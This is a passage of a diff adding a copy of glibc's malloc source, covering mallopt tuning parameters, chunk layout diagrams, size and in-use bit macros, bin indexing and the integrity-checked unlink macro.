+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  malloc_get_state(void);
+
+  Returns the state of all malloc variables in an opaque data
+  structure.
+*/
+void*  __malloc_get_state(void);
+
+/*
+  malloc_set_state(void* state);
+
+  Restore the state of all malloc variables from data obtained with
+  malloc_get_state().
+*/
+int      __malloc_set_state(void*);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
+  are designed especially for use with many small structs, objects or
+  strings -- the default handles structs/objects/arrays with sizes up
+  to 8 4byte fields, or small strings representing words, tokens,
+  etc. Using fastbins for larger objects normally worsens
+  fragmentation without improving speed.
+
+  M_MXFAST is set in REQUEST size units. It is internally used in
+  chunksize units, which adds padding and alignment.  You can reduce
+  M_MXFAST to 0 to disable all use of fastbins.  This causes the malloc
+  algorithm to be a closer approximation of fifo-best-fit in all cases,
+  not just for larger requests, but will generally cause it to be
+  slower.
+*/
+
+
+/* M_MXFAST is a standard SVID/XPG tuning option, usually listed in malloc.h */
+#ifndef M_MXFAST
+#define M_MXFAST            1
+#endif
+
+#ifndef DEFAULT_MXFAST
+#define DEFAULT_MXFAST     (64 * SIZE_SZ / 4)
+#endif
+
+
+/*
+  M_TRIM_THRESHOLD is the maximum amount of unused top-most memory
+  to keep before releasing via malloc_trim in free().
+
+  Automatic trimming is mainly useful in long-lived programs.
+  Because trimming via sbrk can be slow on some systems, and can
+  sometimes be wasteful (in cases where programs immediately
+  afterward allocate more large chunks) the value should be high
+  enough so that your overall system performance would improve by
+  releasing this much memory.
+
+  The trim threshold and the mmap control parameters (see below)
+  can be traded off with one another. Trimming and mmapping are
+  two different ways of releasing unused memory back to the
+  system. Between these two, it is often possible to keep
+  system-level demands of a long-lived program down to a bare
+  minimum. For example, in one test suite of sessions measuring
+  the XF86 X server on Linux, using a trim threshold of 128K and a
+  mmap threshold of 192K led to near-minimal long term resource
+  consumption.
+
+  If you are using this malloc in a long-lived program, it should
+  pay to experiment with these values.  As a rough guide, you
+  might set to a value close to the average size of a process
+  (program) running on your system.  Releasing this much memory
+  would allow such a process to run in memory.  Generally, it's
+  worth it to tune for trimming rather tham memory mapping when a
+  program undergoes phases where several large chunks are
+  allocated and released in ways that can reuse each other's
+  storage, perhaps mixed with phases where there are no such
+  chunks at all.  And in well-behaved long-lived programs,
+  controlling release of large blocks via trimming versus mapping
+  is usually faster.
+
+  However, in most programs, these parameters serve mainly as
+  protection against the system-level effects of carrying around
+  massive amounts of unneeded memory. Since frequent calls to
+  sbrk, mmap, and munmap otherwise degrade performance, the default
+  parameters are set to relatively high values that serve only as
+  safeguards.
+
+  The trim value It must be greater than page size to have any useful
+  effect.  To disable trimming completely, you can set to
+  (unsigned long)(-1)
+
+  Trim settings interact with fastbin (MXFAST) settings: Unless
+  TRIM_FASTBINS is defined, automatic trimming never takes place upon
+  freeing a chunk with size less than or equal to MXFAST. Trimming is
+  instead delayed until subsequent freeing of larger chunks. However,
+  you can still force an attempted trim by calling malloc_trim.
+
+  Also, trimming is not generally possible in cases where
+  the main arena is obtained via mmap.
+
+  Note that the trick some people use of mallocing a huge space and
+  then freeing it at program startup, in an attempt to reserve system
+  memory, doesn't have the intended effect under automatic trimming,
+  since that memory will immediately be returned to the system.
+*/
+
+#define M_TRIM_THRESHOLD       -1
+
+#ifndef DEFAULT_TRIM_THRESHOLD
+#define DEFAULT_TRIM_THRESHOLD (128 * 1024)
+#endif
+
+/*
+  M_TOP_PAD is the amount of extra `padding' space to allocate or
+  retain whenever sbrk is called. It is used in two ways internally:
+
+  * When sbrk is called to extend the top of the arena to satisfy
+  a new malloc request, this much padding is added to the sbrk
+  request.
+
+  * When malloc_trim is called automatically from free(),
+  it is used as the `pad' argument.
+
+  In both cases, the actual amount of padding is rounded
+  so that the end of the arena is always a system page boundary.
+
+  The main reason for using padding is to avoid calling sbrk so
+  often. Having even a small pad greatly reduces the likelihood
+  that nearly every malloc request during program start-up (or
+  after trimming) will invoke sbrk, which needlessly wastes
+  time.
+
+  Automatic rounding-up to page-size units is normally sufficient
+  to avoid measurable overhead, so the default is 0.  However, in
+  systems where sbrk is relatively slow, it can pay to increase
+  this value, at the expense of carrying around more memory than
+  the program needs.
+*/
+
+#define M_TOP_PAD              -2
+
+#ifndef DEFAULT_TOP_PAD
+#define DEFAULT_TOP_PAD        (0)
+#endif
+
+/*
+  MMAP_THRESHOLD_MAX and _MIN are the bounds on the dynamically
+  adjusted MMAP_THRESHOLD.
+*/
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MIN
+#define DEFAULT_MMAP_THRESHOLD_MIN (128 * 1024)
+#endif
+
+#ifndef DEFAULT_MMAP_THRESHOLD_MAX
+  /* For 32-bit platforms we cannot increase the maximum mmap
+     threshold much because it is also the minimum value for the
+     maximum heap size and its alignment.  Going above 512k (i.e., 1M
+     for new heaps) wastes too much address space.  */
+# if __WORDSIZE == 32
+#  define DEFAULT_MMAP_THRESHOLD_MAX (512 * 1024)
+# else
+#  define DEFAULT_MMAP_THRESHOLD_MAX (4 * 1024 * 1024 * sizeof(long))
+# endif
+#endif
+
+/*
+  M_MMAP_THRESHOLD is the request size threshold for using mmap()
+  to service a request. Requests of at least this size that cannot
+  be allocated using already-existing space will be serviced via mmap.
+  (If enough normal freed space already exists it is used instead.)
+
+  Using mmap segregates relatively large chunks of memory so that
+  they can be individually obtained and released from the host
+  system. A request serviced through mmap is never reused by any
+  other request (at least not directly; the system may just so
+  happen to remap successive requests to the same locations).
+
+  Segregating space in this way has the benefits that:
+
+   1. Mmapped space can ALWAYS be individually released back
+      to the system, which helps keep the system level memory
+      demands of a long-lived program low.
+   2. Mapped memory can never become `locked' between
+      other chunks, as can happen with normally allocated chunks, which
+      means that even trimming via malloc_trim would not release them.
+   3. On some systems with "holes" in address spaces, mmap can obtain
+      memory that sbrk cannot.
+
+  However, it has the disadvantages that:
+
+   1. The space cannot be reclaimed, consolidated, and then
+      used to service later requests, as happens with normal chunks.
+   2. It can lead to more wastage because of mmap page alignment
+      requirements
+   3. It causes malloc performance to be more dependent on host
+      system memory management support routines which may vary in
+      implementation quality and may impose arbitrary
+      limitations. Generally, servicing a request via normal
+      malloc steps is faster than going through a system's mmap.
+
+  The advantages of mmap nearly always outweigh disadvantages for
+  "large" chunks, but the value of "large" varies across systems.  The
+  default is an empirically derived value that works well in most
+  systems.
+
+
+  Update in 2006:
+  The above was written in 2001. Since then the world has changed a lot.
+  Memory got bigger. Applications got bigger. The virtual address space
+  layout in 32 bit linux changed.
+
+  In the new situation, brk() and mmap space is shared and there are no
+  artificial limits on brk size imposed by the kernel. What is more,
+  applications have started using transient allocations larger than the
+  128Kb as was imagined in 2001.
+
+  The price for mmap is also high now; each time glibc mmaps from the
+  kernel, the kernel is forced to zero out the memory it gives to the
+  application. Zeroing memory is expensive and eats a lot of cache and
+  memory bandwidth. This has nothing to do with the efficiency of the
+  virtual memory system, by doing mmap the kernel just has no choice but
+  to zero.
+
+  In 2001, the kernel had a maximum size for brk() which was about 800
+  megabytes on 32 bit x86, at that point brk() would hit the first
+  mmaped shared libaries and couldn't expand anymore. With current 2.6
+  kernels, the VA space layout is different and brk() and mmap
+  both can span the entire heap at will.
+
+  Rather than using a static threshold for the brk/mmap tradeoff,
+  we are now using a simple dynamic one. The goal is still to avoid
+  fragmentation. The old goals we kept are
+  1) try to get the long lived large allocations to use mmap()
+  2) really large allocations should always use mmap()
+  and we're adding now:
+  3) transient allocations should use brk() to avoid forcing the kernel
+     having to zero memory over and over again
+
+  The implementation works with a sliding threshold, which is by default
+  limited to go between 128Kb and 32Mb (64Mb for 64 bitmachines) and starts
+  out at 128Kb as per the 2001 default.
+
+  This allows us to satisfy requirement 1) under the assumption that long
+  lived allocations are made early in the process' lifespan, before it has
+  started doing dynamic allocations of the same size (which will
+  increase the threshold).
+
+  The upperbound on the threshold satisfies requirement 2)
+
+  The threshold goes up in value when the application frees memory that was
+  allocated with the mmap allocator. The idea is that once the application
+  starts freeing memory of a certain size, it's highly probable that this is
+  a size the application uses for transient allocations. This estimator
+  is there to satisfy the new third requirement.
+
+*/
+
+#define M_MMAP_THRESHOLD      -3
+
+#ifndef DEFAULT_MMAP_THRESHOLD
+#define DEFAULT_MMAP_THRESHOLD DEFAULT_MMAP_THRESHOLD_MIN
+#endif
+
+/*
+  M_MMAP_MAX is the maximum number of requests to simultaneously
+  service using mmap. This parameter exists because
+  some systems have a limited number of internal tables for
+  use by mmap, and using more than a few of them may degrade
+  performance.
+
+  The default is set to a value that serves only as a safeguard.
+  Setting to 0 disables use of mmap for servicing large requests.
+*/
+
+#define M_MMAP_MAX             -4
+
+#ifndef DEFAULT_MMAP_MAX
+#define DEFAULT_MMAP_MAX       (65536)
+#endif
+
+#include <malloc.h>
+
+#ifndef RETURN_ADDRESS
+#define RETURN_ADDRESS(X_) (NULL)
+#endif
+
+/* On some platforms we can compile internal, not exported functions better.
+   Let the environment provide a macro and define it to be empty if it
+   is not available.  */
+#ifndef internal_function
+# define internal_function
+#endif
+
+/* Forward declarations.  */
+struct malloc_chunk;
+typedef struct malloc_chunk* mchunkptr;
+
+/* Internal routines.  */
+
+static void*  _int_malloc(mstate, size_t);
+static void     _int_free(mstate, mchunkptr, int);
+static void*  _int_realloc(mstate, mchunkptr, INTERNAL_SIZE_T,
+			   INTERNAL_SIZE_T);
+static void*  _int_memalign(mstate, size_t, size_t);
+static void*  _mid_memalign(size_t, size_t, void *);
+
+static void malloc_printerr(int action, const char *str, void *ptr, mstate av);
+
+static void* internal_function mem2mem_check(void *p, size_t sz);
+static int internal_function top_check(void);
+static void internal_function munmap_chunk(mchunkptr p);
+#if HAVE_MREMAP
+static mchunkptr internal_function mremap_chunk(mchunkptr p, size_t new_size);
+#endif
+
+static void*   malloc_check(size_t sz, const void *caller);
+static void      free_check(void* mem, const void *caller);
+static void*   realloc_check(void* oldmem, size_t bytes,
+			       const void *caller);
+static void*   memalign_check(size_t alignment, size_t bytes,
+				const void *caller);
+
+/* ------------------ MMAP support ------------------  */
+
+
+#include <fcntl.h>
+#include <sys/mman.h>
+
+#if !defined(MAP_ANONYMOUS) && defined(MAP_ANON)
+# define MAP_ANONYMOUS MAP_ANON
+#endif
+
+#ifndef MAP_NORESERVE
+# define MAP_NORESERVE 0
+#endif
+
+#define MMAP(addr, size, prot, flags) \
+ __mmap((addr), (size), (prot), (flags)|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)
+
+
+/*
+  -----------------------  Chunk representations -----------------------
+*/
+
+
+/*
+  This struct declaration is misleading (but accurate and necessary).
+  It declares a "view" into memory allowing access to necessary
+  fields at known offsets from a given base. See explanation below.
+*/
+
+struct malloc_chunk {
+
+  INTERNAL_SIZE_T      mchunk_prev_size;  /* Size of previous chunk (if free).  */
+  INTERNAL_SIZE_T      mchunk_size;       /* Size in bytes, including overhead. */
+
+  struct malloc_chunk* fd;         /* double links -- used only if free. */
+  struct malloc_chunk* bk;
+
+  /* Only used for large blocks: pointer to next larger size.  */
+  struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */
+  struct malloc_chunk* bk_nextsize;
+};
+
+
+/*
+   malloc_chunk details:
+
+    (The following includes lightly edited explanations by Colin Plumb.)
+
+    Chunks of memory are maintained using a `boundary tag' method as
+    described in e.g., Knuth or Standish.  (See the paper by Paul
+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+
+/*
+   Check if a request is so large that it would wrap around zero when
+   padded and aligned. To simplify some other code, the bound is made
+   low enough so that adding MINSIZE will also not wrap around zero.
+ */
+
+#define REQUEST_OUT_OF_RANGE(req)                                 \
+  ((unsigned long) (req) >=						      \
+   (unsigned long) (INTERNAL_SIZE_T) (-2 * MINSIZE))
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/*  Same, except also perform argument check */
+
+#define checked_request2size(req, sz)                             \
+  if (REQUEST_OUT_OF_RANGE (req)) {					      \
+      __set_errno (ENOMEM);						      \
+      return 0;								      \
+    }									      \
+  (sz) = request2size (req);
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4byte
+   pointers and size_t.)
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceeded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/* Take a chunk off a bin list */
+#define unlink(AV, P, BK, FD) {                                            \
+    FD = P->fd;								      \
+    BK = P->bk;								      \
+    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
+      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
+    else {								      \
+        FD->bk = BK;							      \
+        BK->fd = FD;							      \
+        if (!in_smallbin_range (chunksize_nomask (P))			      \
+            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
+	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
+		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
+	      malloc_printerr (check_action,				      \
+			       "corrupted double-linked list (not small)",    \
+			       P, AV);					      \
+            if (FD->fd_nextsize == NULL) {				      \
+                if (P->fd_nextsize == P)				      \
+                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
+                else {							      \
+                    FD->fd_nextsize = P->fd_nextsize;			      \
+                    FD->bk_nextsize = P->bk_nextsize;			      \
+                    P->fd_nextsize->bk_nextsize = FD;			      \
+                    P->bk_nextsize->fd_nextsize = FD;			      \
+                  }							      \
+              } else {							      \
+                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
+                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
+              }								      \
+          }								      \
+      }									      \
+}
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
